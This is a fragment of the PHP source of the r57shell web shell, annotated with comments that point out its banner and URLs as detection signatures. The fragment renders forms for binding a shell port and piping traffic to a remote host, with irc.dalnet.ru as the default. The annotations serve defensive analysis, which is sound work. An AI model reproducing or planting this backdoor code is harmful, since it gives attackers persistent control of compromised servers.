2192echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2193echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2194echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
// Third column. The select shows datapipe.pl / datapipe.c as labels but submits the
// same values (Perl / C) under the same field name (use) as the other two columns.
2195echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2196echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2197echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2198echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2199echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2200echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2201echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2202echo $te."</td>".$fe."</tr></div></table>";
2203}
// Page footer: closes the layout tables and prints the static banner
// "r57shell - http-shell by RST/GHC" with the two project URLs and $version
// (assigned elsewhere in the file).
// Detection: the banner text and the two URLs appear verbatim in every rendered
// page, so they work as content signatures for response inspection and for
// scanning web roots; a modified copy may have them altered or removed.
2204echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>";
2205echo '</body></html>';
2206?>